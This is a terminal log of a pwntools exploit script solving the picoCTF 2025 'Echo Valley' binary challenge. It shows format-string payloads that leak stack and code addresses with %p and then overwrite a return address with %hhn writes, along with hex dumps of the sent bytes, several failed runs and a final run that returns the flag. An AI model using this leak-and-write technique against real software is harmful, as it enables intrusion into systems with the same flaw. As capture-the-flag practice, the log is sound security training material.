    000000a0  b5 d7 d7 fd  7f                                     x????x?x
    000000a5
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ISO-8859-1, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] You heard in the distance:                                                                                                  9bb315c0                        0  ??××?\x7f
[*] Closed connection to shape-facility.picoctf.net port 56971
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$

(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$ python exploit_valley.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/valley'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[*] addr_main_offset=0x00001401, addr_flag_offset=0x00001269
[+] Opening connection to shape-facility.picoctf.net on port 56971: Done
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x2b bytes:
    b'Welcome to the Echo Valley, Try Shouting: \n'
[DEBUG] Sent 0x11 bytes:
    b'%20$p %21$p     \n'
/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py:29: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  info( proc.recvuntil('distance: ') ) # You heard in the distance:
[DEBUG] Received 0x3e bytes:
    b'You heard in the distance: 0x7ffe46ef6600 0x5dcef8277413     \n'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*]
    You heard in the distance:
[*] addr=0x7ffe46ef6600 0x5dcef8277413
    , lst_addr[0]=0x7ffe46ef6600, lst_addr[1]=0x5dcef8277413
[*] addr_main=0x5dcef8277401, addr_flag=0x5dcef8277269, addr_stack=0x7ffe46ef65f8
[*] first < second: ss=%105x%9$hhn%9x%10$hhn
[DEBUG] Sent 0x29 bytes:
    00000000  25 31 30 35  78 25 39 24  68 68 6e 25  39 78 25 31  x%105xx%9$xhhn%x9x%1x
    00000010  30 24 68 68  6e 20 20 20  f8 65 ef 46  fe 7f 00 00  x0$hhxn   x?e?Fx????x
    00000020  f9 65 ef 46  fe 7f 00 00  0a                        x?e?Fx????x?x
    00000029
[DEBUG] Sent 0x5 bytes:
    b'exit\n'
[DEBUG] Received 0x96 bytes:
    00000000  59 6f 75 20  68 65 61 72  64 20 69 6e  20 74 68 65  xYou xhearxd inx thex
    00000010  20 64 69 73  74 61 6e 63  65 3a 20 20  20 20 20 20  x disxtancxe:  x    x
    00000020  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  x    x    x    x    x
    *
    00000070  20 20 20 20  20 20 20 20  20 20 20 20  65 34 33 62  x    x    x    xe43bx
    00000080  64 35 63 30  20 20 20 20  20 20 20 20  30 20 20 20  xd5c0x    x    x0   x
    00000090  f8 65 ef 46  fe 7f                                  x?e?Fx??x
    00000096
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ISO-8859-1, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] You heard in the distance:                                                                                                  e43bd5c0        0   ?e?F?\x7f
[*] Closed connection to shape-facility.picoctf.net port 56971
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$ python exploit_valley.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/valley'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[*] addr_main_offset=0x00001401, addr_flag_offset=0x00001269
[+] Opening connection to shape-facility.picoctf.net on port 56971: Done
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x2b bytes:
    b'Welcome to the Echo Valley, Try Shouting: \n'
[DEBUG] Sent 0x11 bytes:
    b'%20$p %21$p     \n'
/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py:30: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  info( proc.recvuntil('distance: ') ) # You heard in the distance:
[DEBUG] Received 0x3e bytes:
    b'You heard in the distance: 0x7ffcdb0abf40 0x634736536413     \n'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*]
    You heard in the distance:
[*] addr=0x7ffcdb0abf40 0x634736536413
    , lst_addr[0]=0x7ffcdb0abf40, lst_addr[1]=0x634736536413
[*] addr_main=0x634736536401, addr_flag=0x634736536269, addr_stack=0x7ffcdb0abf38
[*] first > second: ss=%98x%9$hhn%7x%10$hhn
[DEBUG] Sent 0x29 bytes:
    00000000  25 39 38 78  25 39 24 68  68 6e 25 37  78 25 31 30  x%98xx%9$hxhn%7xx%10x
    00000010  24 68 68 6e  20 20 20 20  39 bf 0a db  fc 7f 00 00  x$hhnx    x9???x????x
    00000020  38 bf 0a db  fc 7f 00 00  0a                        x8???x????x?x
    00000029
^CTraceback (most recent call last):
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py", line 80, in <module>
    main()
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py", line 76, in main
    attack( proc )
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py", line 59, in attack
    time.sleep(3)
KeyboardInterrupt
[*] Closed connection to shape-facility.picoctf.net port 56971

(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:130]$ python exploit_valley.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/valley'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[*] addr_main_offset=0x00001401, addr_flag_offset=0x00001269
[+] Opening connection to shape-facility.picoctf.net on port 53172: Done
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x2b bytes:
    b'Welcome to the Echo Valley, Try Shouting: \n'
[DEBUG] Sent 0x11 bytes:
    b'%20$p %21$p     \n'
/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py:30: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  info( proc.recvuntil('distance: ') ) # You heard in the distance:
[DEBUG] Received 0x3e bytes:
    b'You heard in the distance: 0x7fffefd99aa0 0x5586b8d91413     \n'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*]
    You heard in the distance:
[*] addr=0x7fffefd99aa0 0x5586b8d91413
    , lst_addr[0]=0x7fffefd99aa0, lst_addr[1]=0x5586b8d91413
[*] addr_main=0x5586b8d91401, addr_flag=0x5586b8d91269, addr_stack=0x7fffefd99a98
[*] first > second: ss=%18x%9$hhn%87x%10$hhn
[DEBUG] Sent 0x29 bytes:
    00000000  25 31 38 78  25 39 24 68  68 6e 25 38  37 78 25 31  x%18xx%9$hxhn%8x7x%1x
    00000010  30 24 68 68  6e 20 20 20  99 9a d9 ef  ff 7f 00 00  x0$hhxn   x????x????x
    00000020  98 9a d9 ef  ff 7f 00 00  0a                        x????x????x?x
    00000029
[DEBUG] Sent 0x5 bytes:
    b'exit\n'
[DEBUG] Received 0x8d bytes:
    00000000  59 6f 75 20  68 65 61 72  64 20 69 6e  20 74 68 65  xYou xhearxd inx thex
    00000010  20 64 69 73  74 61 6e 63  65 3a 20 20  20 20 20 20  x disxtancxe:  x    x
    00000020  20 20 20 20  20 64 63 31  63 36 35 63  30 20 20 20  x    x dc1xc65cx0   x
    00000030  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  x    x    x    x    x
    *
    00000080  20 20 20 30  20 20 20 99  9a d9 ef ff  7f           x   0x   ?x????x?x
    0000008d
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ISO-8859-1, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] You heard in the distance:           dc1c65c0                                                                                      0   ???\x7f
[*] Closed connection to shape-facility.picoctf.net port 53172
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$ python exploit_valley.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/valley'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[*] addr_main_offset=0x00001401, addr_flag_offset=0x00001269
[+] Opening connection to shape-facility.picoctf.net on port 53172: Done
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x2b bytes:
    b'Welcome to the Echo Valley, Try Shouting: \n'
[DEBUG] Sent 0x11 bytes:
    b'%20$p %21$p     \n'
/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py:30: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  info( proc.recvuntil('distance: ') ) # You heard in the distance:
[DEBUG] Received 0x3e bytes:
    b'You heard in the distance: 0x7ffd0d2c68a0 0x64b60cf6e413     \n'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*]
    You heard in the distance:
[*] addr=0x7ffd0d2c68a0 0x64b60cf6e413
    , lst_addr[0]=0x7ffd0d2c68a0, lst_addr[1]=0x64b60cf6e413
[*] addr_main=0x64b60cf6e401, addr_flag=0x64b60cf6e269, addr_stack=0x7ffd0d2c6898
[*] first < second: ss=%105x%9$hhn%121x%10$hhn
[DEBUG] Sent 0x29 bytes:
    00000000  25 31 30 35  78 25 39 24  68 68 6e 25  31 32 31 78  x%105xx%9$xhhn%x121xx
    00000010  25 31 30 24  68 68 6e 20  98 68 2c 0d  fd 7f 00 00  x%10$xhhn x?h,?x????x
    00000020  99 68 2c 0d  fd 7f 00 00  0a                        x?h,?x????x?x
    00000029
[DEBUG] Sent 0x5 bytes:
    b'exit\n'
[DEBUG] Received 0x104 bytes:
    00000000  59 6f 75 20  68 65 61 72  64 20 69 6e  20 74 68 65  xYou xhearxd inx thex
    00000010  20 64 69 73  74 61 6e 63  65 3a 20 20  20 20 20 20  x disxtancxe:  x    x
    00000020  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  x    x    x    x    x
    *
    00000070  20 20 20 20  20 20 20 20  20 20 20 20  64 39 36 62  x    x    x    xd96bx
    00000080  65 35 63 30  20 20 20 20  20 20 20 20  20 20 20 20  xe5c0x    x    x    x
    00000090  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  x    x    x    x    x
    *
    000000f0  20 20 20 20  20 20 20 20  20 20 20 20  30 20 98 68  x    x    x    x0 ?hx
    00000100  2c 0d fd 7f                                         x,???x
    00000104
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ISO-8859-1, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] You heard in the distance:                                                                                                  d96be5c0                                                                                                                        0 h,
    ?\x7f
[*] Closed connection to shape-facility.picoctf.net port 53172
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$ python exploit_valley.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/valley'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[*] addr_main_offset=0x00001401, addr_flag_offset=0x00001269
[+] Opening connection to shape-facility.picoctf.net on port 64417: Done
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x2b bytes:
    b'Welcome to the Echo Valley, Try Shouting: \n'
[DEBUG] Sent 0x11 bytes:
    b'%20$p %21$p     \n'
/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py:30: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  info( proc.recvuntil('distance: ') ) # You heard in the distance:
[DEBUG] Received 0x3e bytes:
    b'You heard in the distance: 0x7ffdc0059a00 0x59e0fdca1413     \n'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*]
    You heard in the distance:
[*] addr=0x7ffdc0059a00 0x59e0fdca1413
    , lst_addr[0]=0x7ffdc0059a00, lst_addr[1]=0x59e0fdca1413
[*] addr_main=0x59e0fdca1401, addr_flag=0x59e0fdca1269, addr_stack=0x7ffdc00599f8
[*] first > second: ss=%18x%9$hhn%87x%10$hhn
[DEBUG] Sent 0x29 bytes:
    00000000  25 31 38 78  25 39 24 68  68 6e 25 38  37 78 25 31  x%18xx%9$hxhn%8x7x%1x
    00000010  30 24 68 68  6e 20 20 20  f9 99 05 c0  fd 7f 00 00  x0$hhxn   x????x????x
    00000020  f8 99 05 c0  fd 7f 00 00  0a                        x????x????x?x
    00000029
[DEBUG] Sent 0x5 bytes:
    b'exit\n'
[DEBUG] Received 0x8d bytes:
    00000000  59 6f 75 20  68 65 61 72  64 20 69 6e  20 74 68 65  xYou xhearxd inx thex
    00000010  20 64 69 73  74 61 6e 63  65 3a 20 20  20 20 20 20  x disxtancxe:  x    x
    00000020  20 20 20 20  20 39 65 39  66 63 35 63  30 20 20 20  x    x 9e9xfc5cx0   x
    00000030  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  x    x    x    x    x
    *
    00000080  20 20 20 30  20 20 20 f9  99 05 c0 fd  7f           x   0x   ?x????x?x
    0000008d
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ISO-8859-1, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] You heard in the distance:           9e9fc5c0                                                                                      0   ?\x05??\x7f
[*] Closed connection to shape-facility.picoctf.net port 64417
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$ python exploit_valley.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/valley'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[*] addr_main_offset=0x00001401, addr_flag_offset=0x00001269
[+] Opening connection to shape-facility.picoctf.net on port 64417: Done
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x2b bytes:
    b'Welcome to the Echo Valley, Try Shouting: \n'
[DEBUG] Sent 0x11 bytes:
    b'%20$p %21$p     \n'
/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py:30: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  info( proc.recvuntil('distance: ') ) # You heard in the distance:
[DEBUG] Received 0x3e bytes:
    b'You heard in the distance: 0x7ffc3fb0bab0 0x5b6949e40413     \n'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*]
    You heard in the distance:
[*] addr=0x7ffc3fb0bab0 0x5b6949e40413
    , lst_addr[0]=0x7ffc3fb0bab0, lst_addr[1]=0x5b6949e40413
[*] addr_main=0x5b6949e40401, addr_flag=0x5b6949e40269, addr_stack=0x7ffc3fb0baa8
[*] first > second: ss=%2x%9$hhn%103x%10$hhn
[DEBUG] Sent 0x29 bytes:
    00000000  25 32 78 25  39 24 68 68  6e 25 31 30  33 78 25 31  x%2x%x9$hhxn%10x3x%1x
    00000010  30 24 68 68  6e 20 20 20  a9 ba b0 3f  fc 7f 00 00  x0$hhxn   x????x????x
    00000020  a8 ba b0 3f  fc 7f 00 00  0a                        x????x????x?x
    00000029
[DEBUG] Sent 0x5 bytes:
    b'exit\n'
[+] Receiving all data: Done (169B)
[DEBUG] Received 0x93 bytes:
    00000000  59 6f 75 20  68 65 61 72  64 20 69 6e  20 74 68 65  xYou xhearxd inx thex
    00000010  20 64 69 73  74 61 6e 63  65 3a 20 33  33 62 39 39  x disxtancxe: 3x3b99x
    00000020  35 63 30 20  20 20 20 20  20 20 20 20  20 20 20 20  x5c0 x    x    x    x
    00000030  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  x    x    x    x    x
    *
    00000080  20 20 20 20  20 20 20 20  20 30 20 20  20 a9 ba b0  x    x    x 0  x ???x
    00000090  3f fc 7f                                            x???x
    00000093
[DEBUG] Received 0x16 bytes:
    b'The Valley Disappears\n'
[*] Closed connection to shape-facility.picoctf.net port 64417
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ISO-8859-1, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] You heard in the distance: 33b995c0                                                                                                      0   ??°??\x7fThe Valley Disappears
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$ python exploit_valley.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/valley'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[*] addr_main_offset=0x00001401, addr_flag_offset=0x00001269
[+] Opening connection to shape-facility.picoctf.net on port 64417: Done
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x2b bytes:
    b'Welcome to the Echo Valley, Try Shouting: \n'
[DEBUG] Sent 0x11 bytes:
    b'%20$p %21$p     \n'
/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py:30: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  info( proc.recvuntil('distance: ') ) # You heard in the distance:
[DEBUG] Received 0x3e bytes:
    b'You heard in the distance: 0x7ffda1f4ee60 0x625be7421413     \n'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*]
    You heard in the distance:
[*] addr=0x7ffda1f4ee60 0x625be7421413
    , lst_addr[0]=0x7ffda1f4ee60, lst_addr[1]=0x625be7421413
[*] addr_main=0x625be7421401, addr_flag=0x625be7421269, addr_stack=0x7ffda1f4ee58
[*] first > second: ss=%18x%9$hhn%87x%10$hhn
[DEBUG] Sent 0x29 bytes:
    00000000  25 31 38 78  25 39 24 68  68 6e 25 38  37 78 25 31  x%18xx%9$hxhn%8x7x%1x
    00000010  30 24 68 68  6e 20 20 20  59 ee f4 a1  fd 7f 00 00  x0$hhxn   xY???x????x
    00000020  58 ee f4 a1  fd 7f 00 00  0a                        xX???x????x?x
    00000029
[DEBUG] Sent 0x5 bytes:
    b'exit\n'
[+] Receiving all data: Done (222B)
[DEBUG] Received 0x8d bytes:
    00000000  59 6f 75 20  68 65 61 72  64 20 69 6e  20 74 68 65  xYou xhearxd inx thex
    00000010  20 64 69 73  74 61 6e 63  65 3a 20 20  20 20 20 20  x disxtancxe:  x    x
    00000020  20 20 20 20  20 65 62 37  39 64 35 63  30 20 20 20  x    x eb7x9d5cx0   x
    00000030  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  x    x    x    x    x
    *
    00000080  20 20 20 30  20 20 20 59  ee f4 a1 fd  7f           x   0x   Yx????x?x
    0000008d
[DEBUG] Received 0x51 bytes:
    b'The Valley Disappears\n'
    b'Congrats! Here is your flag: picoctf{f1ckl3_f0rmat_f1asc0}\n'
[*] Closed connection to shape-facility.picoctf.net port 64417
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ISO-8859-1, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] You heard in the distance:           eb79d5c0                                                                                      0   Y????\x7fThe Valley Disappears
    Congrats! Here is your flag: picoctf{f1ckl3_f0rmat_f1asc0}
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$
